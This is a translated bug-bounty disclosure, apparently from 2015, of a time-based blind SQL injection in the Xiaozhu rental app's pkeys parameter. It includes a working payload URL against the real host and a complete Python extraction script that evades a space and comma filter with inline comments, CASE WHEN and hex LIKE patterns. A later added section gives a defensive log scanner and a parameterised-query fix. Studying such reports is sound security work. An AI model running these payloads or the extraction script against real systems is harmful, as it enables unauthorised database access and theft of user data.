2015-12-03: Details have been sent to the vendor and are awaiting processing.
2015-12-03: Vendor has confirmed; details are disclosed to the vendor only.
2015-12-04: Vendor has fixed the vulnerability and disclosed it proactively; details are now public.
Asking for advice: an sqlmap tamper that rewrites IF to CASE or bypasses commas
Target: testing the official Xiaozhu (short-term rental) app showed SQL injection at the following location (injection parameter: pkeys, time-based blind):
http://wireless.xiaozhu.com/app/xzfk/android/220/global/version?_=1449119094538&sessId=f83651f6f45cb6e94578c69a051f8185&pkeys=homecity%2Ccity_searchfilter_13%2Ccity_searchfilter_132&dispathChannel=xiaozhu&userId=1823761635
Payload as follows (sleeps for 4 seconds):
http://wireless.xiaozhu.com/app/xzfk/android/220/global/version?_=1449119094538&sessId=f83651f6f45cb6e94578c69a051f8185&pkeys=')/**/AND/**/(SELECT(0)FROM(SELECT(SLEEP(4)))CTAQ)/**/AND/**/('oUPP'='oUPP&dispathChannel=xiaozhu&userId=1823761635
sqlmap did not detect it when I ran it against the target. Manual inspection showed that spaces and commas are filtered, so I wrote a Python script to extract data (the example below extracts the current database, database(); change the proxy before testing):
#!/usr/bin/env python
#coding=utf8
# Extracts database() one character at a time through the time-based blind
# injection in pkeys. Spaces are replaced with /**/ and no commas are used,
# so the guess is expressed as LIKE 0x<hex-so-far><hex-guess>25 (0x25 = '%')
# and CASE ... WHEN ... END stands in for IF(). A positive result (response
# slower than 2 s) is re-sent once to confirm before the character is accepted.
import httplib, time

database = ''       # recovered name, as text
temp_database = ''  # recovered name, as hex (goes into the LIKE pattern)
httpClient = None
count = 0           # 1 = previous request was slow, re-sending to confirm
i = 33              # candidate character code (printable ASCII 33..127)

while i < 128:
    if i == 37:          # skip '%', the LIKE wildcard
        i = i + 1
    try:
        headers = {"Host": "wireless.xiaozhu.com",
                   "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
                   "Accept-Encoding": "gzip,deflate",
                   "Accept": "*/*",
                   "Connection": "keep-alive"}
        # Requests are sent through a local proxy; change host/port to your own
        httpClient = httplib.HTTPConnection("192.168.1.2", 8888, timeout=30)
        url = ("http://wireless.xiaozhu.com/app/xzfk/android/220/global/version?_=1449119094538&sessId=f83651f6f45cb6e94578c69a051f8185"
               "&pkeys=')/**/AND/**/(SELECT(0)FROM(SELECT(SLEEP(CASE/**/WHEN(database()/**/like/**/0x"
               + temp_database + str(hex(i))[2:] +
               "25)THEN/**/2/**/ELSE/**/0/**/END)))CTAQ)/**/AND/**/('oUPP'='oUPP&dispathChannel=xiaozhu&userId=1823761635")
        httpClient.request("GET", url=url, headers=headers)
        st = time.time()
        response = httpClient.getresponse()
        rp = response.read()
        elapsed = time.time() - st
        if count == 1:
            if elapsed > 2:        # slow twice in a row: accept the character
                temp_database = temp_database + str(hex(i))[2:]
                database = database + chr(i)
                print 'count from user: ', database
                i = 32             # the increment below restarts the scan at 33
                count = 0
            else:
                count = 0          # not reproducible: treat as noise, move on
        elif elapsed > 2:
            count = 1              # first hit: repeat the same character
            i = i - 1
        i = i + 1
    except Exception, e:
        print e
    finally:
        if httpClient:
            httpClient.close()
1. Extracted the current database user.
2. Extracted the current database name.
3. Extracted the row count of the user table in the current database: over 1.3 million rows. This was for testing only; I did not go any further.
Comments and advice welcome~
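The filter described above (spaces and commas blocked) is a blacklist, and the payload shows why a blacklist fails: inline comments replace spaces, CASE WHEN replaces IF(), and a hex LIKE pattern avoids quotes and commas. The example below is added here and is not code from the report or from the vendor. It does two things from the defender's side: it scans constructed access-log lines (the two probe requests are modelled on the report's URLs, the rest are made up) by URL-decoding each parameter and collapsing comments to spaces before looking for time-based-injection indicators, so that even a negative CASE WHEN probe with a fast response is caught; and it shows the parameterised query that removes the bug, binding each comma-separated key from pkeys instead of splicing the value into SQL. The global_config table and its columns are assumptions.

```python
"""Added example (not from the report): detect the comment-obfuscated,
time-based blind SQL injection probes shown above in request logs, and
show the parameterised query that removes the underlying bug.

All log lines below are constructed; the two probe requests are modelled on
the report's URLs. The global_config table and its columns are assumptions.
"""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines: METHOD TARGET STATUS RESPONSE_SECONDS
SAMPLE_LOG = """\
GET /app/xzfk/android/220/global/version?_=1449119094538&pkeys=homecity%2Ccity_searchfilter_13%2Ccity_searchfilter_132&dispathChannel=xiaozhu 200 0.12
GET /app/xzfk/android/220/global/version?_=1449119094538&pkeys=')/**/AND/**/(SELECT(0)FROM(SELECT(SLEEP(4)))CTAQ)/**/AND/**/('oUPP'='oUPP&dispathChannel=xiaozhu 200 4.31
GET /app/xzfk/android/220/global/version?pkeys=')/**/AND/**/(SELECT(0)FROM(SELECT(SLEEP(CASE/**/WHEN(database()/**/like/**/0x7825)THEN/**/2/**/ELSE/**/0/**/END)))CTAQ)/**/AND/**/('oUPP'='oUPP 200 0.09
GET /app/xzfk/android/220/global/version?pkeys=homecity,city_searchfilter_13 200 0.10
"""

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
TIME_FUNC_RE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I)
CASE_WHEN_RE = re.compile(r"\bcase\s+when\b", re.I)
QUOTE_BREAK_RE = re.compile(r"['\"]\s*\)?\s*(and|or)\b", re.I)


def normalize_param(value):
    """Undo the obfuscation a space/comma blacklist does not see: parse_qs has
    already URL-decoded the value, so here inline comments become spaces and
    whitespace is collapsed. A filter that inspects the raw value misses this."""
    no_comments = COMMENT_RE.sub(" ", value)
    return re.sub(r"\s+", " ", no_comments).strip().lower()


def classify_request(line):
    """Parse one log line; return the indicators found per parameter and
    whether the response was slow enough to be a positive time-based probe."""
    _method, target, _status, seconds = line.split()
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    indicators = []
    for name, values in params.items():
        for raw in values:
            norm = normalize_param(raw)
            if TIME_FUNC_RE.search(norm):
                indicators.append(name + ":time-function")
            if CASE_WHEN_RE.search(norm):
                indicators.append(name + ":case-when")
            if QUOTE_BREAK_RE.search(norm):
                indicators.append(name + ":quote-break")
            if "/*" in raw and " " not in raw:
                indicators.append(name + ":comment-as-space")
    return {"target": target, "indicators": indicators, "slow": float(seconds) >= 2.0}


def scan_log(text):
    """Classify every non-empty line. A request is flagged on indicators alone,
    so a negative CASE WHEN probe (ELSE 0, fast response) is still caught."""
    return [classify_request(l) for l in text.splitlines() if l.strip()]


def flagged(results):
    """Only the requests that carry at least one indicator."""
    return [r for r in results if r["indicators"]]


# ---- the fix: bind each key, never splice pkeys into the SQL text ----------
def demo_db():
    """Constructed in-memory table standing in for the app's key/value config."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE global_config (pkey TEXT PRIMARY KEY, value TEXT)")
    conn.executemany("INSERT INTO global_config VALUES (?, ?)",
                     [("homecity", "beijing"), ("city_searchfilter_13", "f13")])
    conn.commit()
    return conn


def lookup_pkeys_safe(conn, pkeys_value):
    """Split on the comma the app expects, then bind every key as a parameter.
    An injection string becomes one non-matching literal key; nothing executes."""
    keys = [k for k in pkeys_value.split(",") if k]
    if not keys:
        return []
    placeholders = ",".join("?" * len(keys))
    sql = "SELECT pkey, value FROM global_config WHERE pkey IN (%s)" % placeholders
    return conn.execute(sql, keys).fetchall()


if __name__ == "__main__":
    for r in flagged(scan_log(SAMPLE_LOG)):
        print("slow" if r["slow"] else "fast", r["indicators"])
    conn = demo_db()
    print(lookup_pkeys_safe(conn, "homecity,city_searchfilter_13,city_searchfilter_132"))
    print(lookup_pkeys_safe(conn, "')/**/AND/**/(SELECT(0)FROM(SELECT(SLEEP(4)))CTAQ)/**/AND/**/('oUPP'='oUPP"))
```

Two points of the design are worth noting. Response time alone would only flag the second line; the third line is the script's probe for a wrong guess (ELSE 0), which returns fast, and only the normalised-content check catches it. And the parameterised lookup does not need a blacklist at all: the value is split on the one comma the application expects, and each piece is bound, so the payload is compared as a literal string against pkey and simply matches nothing.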
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-12-03 16:18
Impressive! If you're interested, come and have a chat with us.
2015-12-04: Fixed. Come and chat with us when you have time.